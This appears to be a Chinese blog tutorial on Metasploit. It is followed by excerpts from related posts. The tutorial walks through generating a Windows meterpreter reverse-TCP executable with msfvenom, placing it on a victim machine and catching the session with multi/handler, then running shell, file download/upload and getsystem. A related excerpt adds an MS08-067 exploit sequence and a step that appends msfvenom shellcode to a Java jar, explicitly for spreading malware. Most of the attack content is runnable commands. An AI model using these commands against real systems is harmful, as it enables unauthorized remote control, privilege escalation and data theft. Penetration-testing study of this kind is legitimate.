内网渗透之——msf工具使用

最新推荐文章于 2025-10-21 18:20:10 发布
原创 最新推荐文章于 2025-10-21 18:20:10 发布 · 7.3k 阅读 · 49 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍Metasploit框架的使用方法,包括msfconsole、msfvenom和msfencode的功能与操作流程,演示了如何利用这些工具进行木马制作、编码及反弹shell连接,实现远程控制和信息提取。

1.msfconsole

作用:
管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。
模块介绍:
exploits:攻击脚本
payloads:攻击载荷(攻击效果控制)
auxiliaru:辅助模块(扫描工具等)
post:后渗透模块(提取信息)
encoders编码模块
nops:无操作生成器

2.msfvenom

作用:
制作木马

3.msfencode

作用:
对木马进行编码

4.msf使用:

1.打开一个终端,输入msfconsole 进入应用
​​​​在这里插入图片描述
2.查看各个模块内容(例:show payloads)
在这里插入图片描述
3.选择带reverse和meterpreter(发送端接受端连接)的payloads进行反弹端口
例:此处选择windows/x64/meterpreter_reverse_tcp,使用use windows/x64/meterpreter_reverse_tcp选择此payloads,输入show options查看使用方法
在这里插入图片描述
4.再打开一个终端,进行木马制作,生成的木马在当前目录下,之后将该文件复制到windows下(如不能复制,可开启ssh,使用xshell的sz 1.exe下载命令进行操作:开启ssh服务,/etc/ssh/sshd_config第32行改为PermitRootLogin yes,之后xshell连接)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=本机ip lport=端口 -f exe -o 1.exe

在这里插入图片描述
5.将刚制作好的木马1.exe传到受害机上
在这里插入图片描述
6.再次输入msfconsole 进入应用,输入use exploit/multi/handler进入管理工具
在这里插入图片描述
7.设置监听刚才生成木马的同一payload:set payload windows/x64/meterpreter_reverse_tcp
在这里插入图片描述
8.配置管理机ip(攻击者本机):set lhost 192.168.16.130
在这里插入图片描述
9.执行此管理工具:输入exploit
在这里插入图片描述
10.运行刚刚上传的1.exe木马,再查看管理攻击,拿到连接meterpreter
在这里插入图片描述
11.输入?可查看攻击命令,之后进行攻击即可

例:

获取命令行:shell
在这里插入图片描述
获取系统信息:sysinfo
在这里插入图片描述
下载文件:download 1.txt
在这里插入图片描述
上传文件:upload 路径
在这里插入图片描述
提权:getsystem
在这里插入图片描述

渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 6404
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具
MSF使用教程
huangyongkang666的博客
03-26 1万+
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 7070
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
Kali利用msf渗透Windows电脑(超详细)
最新发布
ewii12567的博客
10-21 831
本文详细介绍了使用Kali Linux和meterpreter进行渗透测试的完整流程,包括进入管理员模式、生成可执行文件、配置参数、获取靶机访问权限等步骤,并列举了丰富的meterpreter命令用于监控靶机、文件操作、键盘记录、音频录制、摄像头操作等。该教程适合网络安全初学者,通过实际操作学习渗透测试技术,提供了从基础到进阶的学习路径。
MSF使用
qq_63980959的博客
04-05 988
Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。
工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 16万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集2 ——基于SNMP协议收集主机信息
天下著书立传者,皆为我师
05-06 848
渗透测试 — Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集2 ——基于SNMP协议收集主机信息
Metasploit 内网渗透三 ———Metasploit 渗透测试之信息搜集5 ——基于FTP协议收集信息
天下著书立传者,皆为我师
05-12 839
FTP(File Transfer Protocol,文件传输协议)是用于在计算机网络上进行文件传输的标准网络协议,客户端-服务器协议允许用户从一个计算机向另一个计算机传输文件。端口号2
渗透测试笔记】之【内网渗透——横向移动:PsExec的使用
2401_85599090的博客
06-25 568
【代码】【渗透测试笔记】之【内网渗透——横向移动:PsExec的使用
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
天下著书立传者,皆为我师
04-18 1582
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
MSF使用教程
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
利用Metasploit Framework(msf)进行内网(域)渗透
初学者L_言的博客
07-03 6838
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
内网渗透 Metasploit(MSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF使用,信息搜集,模块详解,端口扫描,反弹shell
渗透基本流程--msf简单使用
沐目的博客
10-16 2769
渗透流程 1.漏洞挖掘 1.1 端口扫描 查看是否存在一些高危端口,如443的心脏滴血,445的永恒之蓝这两个是我知道的。如果扫到其他端口,那么可以用metasploit 的search命令,去查看是否有相应的漏洞。假如说我们通过nmap扫到了samba服务: 那么我们就可以去找一个最新的它的漏洞尝试攻击它。 1.2 CMS 有时候网站是用CMS搭建的,那么这个CMS本身就可能存在漏洞,我们还是可...
MSF简单的使用教程
Bul1et的博客
10-24 1万+
Kali自带MSF工具 假如此时nessus扫到了主机漏洞  比如ms.... 启动msf msfconsole 2.secrch ms模块 找到模块  使用模块 查看模块需要的命令   ip或者端口 使用set命令进行设置  ip或者端口 然后使用run命令  开始验证 ...
MSF基本使用
浅笑996的博客
11-10 2790
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
MSF使用学习
2302_80097039的博客
09-19 2320
更新安装包信息;只检查,不更新(已安装的软件包是否有可用的更新,给出汇总报告)# 更新已安装的软件包,不删除旧包;# 升级包,删除旧包二、使用方法使用方法:1. 基础使用:#进入框架# 使用search命令查找相关漏洞# 使用use进入模块#使用info查看模块信息#设置攻击载荷#查看模块需要配置的参数#设置参数#攻击后渗透阶段 #后渗透阶段。
内网渗透msf
03-15
### 关于 Metasploit 框架在内网渗透中的应用 #### 什么是 Metasploit? Metasploit 是一种功能强大的开源渗透测试框架,广泛应用于网络安全评估和漏洞研究领域。该框架提供了丰富的模块化设计,支持多种类型的攻击向量以及后渗透阶段的操作工具[^1]。 #### 内网渗透的主要过程 内网渗透通常遵循标准化的渗透测试流程,具体分为以下几个部分: - **前期交互 (Pre-engagement Interactions)** 此阶段涉及与客户沟通以明确目标范围、时间安排以及其他约束条件等内容[^2]。 - **情报收集 (Intelligence Gathering)** 利用公开资源或技术手段搜集有关目标网络的信息,例如 IP 地址、开放端口和服务版本等数据。 - **威胁建模 (Thread Modelling)** 对所获得的情报进行分析处理,并识别潜在的安全风险点。 - **漏洞分析 (Vulnerability Analysis)** 运用扫描器或其他自动化工具检测系统中存在的弱点,同时验证其真实性。 - **渗透攻击 (Exploitation)** 配置合适的exploit模块针对发现的目标服务发起实际攻击尝试获取控制权^。 - **后渗透攻击 (Post Exploitation)** 成功入侵之后进一步探索内部环境寻找敏感资料或者横向移动至其他主机上继续扩展访问权限^。 - **报告撰写 (Reporting)** 将整个过程中遇到的问题汇总整理成文档形式提交给委托方作为改进依据^。 #### 使用案例:通过 MS08-067 漏洞实现远程代码执行 假设存在一台运行 Windows Server 2003 的服务器未修补 CVE-2008-4250(即著名的 MS08-067),可以按照如下方式利用 Metasploit 来完成对该机器的接管工作: ```bash use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <local_ip> set LPORT <listening_port> run ``` 上述命令序列依次完成了指定目标地址、选择有效载荷类型及其参数设置最后启动攻击动作的任务描述[^3]^。 另外,在某些特殊场景下如果目标环境中部署有 Java 应用程序,则还可以考虑采用基于 JVM 层面存在的缺陷来进行突破尝试。比如下面这个例子展示了如何创建一个带有隐藏功能的 JAR 文件用于分发传播恶意软件实例: ```java import java.io.*; public class Evil { public static void main(String[] args){ try{ Runtime.getRuntime().exec("cmd /c start calc.exe"); }catch(Exception e){} } } // Compile and package into a jar file. javac Evil.java && jar cvfe evil.jar Evil.class . ``` 接着再配合 `msfvenom` 工具生成自定义 payload 并嵌入到刚才准备好的载体当中去形成最终成品供后续投放使用[^4]^。 ```bash msfvenom -p generic/shell_reverse_tcp LHOST=<your_IP> LPORT=<port_number> -f raw > shellcode.bin cat shellcode.bin >> evil.jar zip -A evil.jar ``` 以上便是关于如何运用 Metasploit 开展内网渗透活动的一些基础知识和技术要点概述。
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值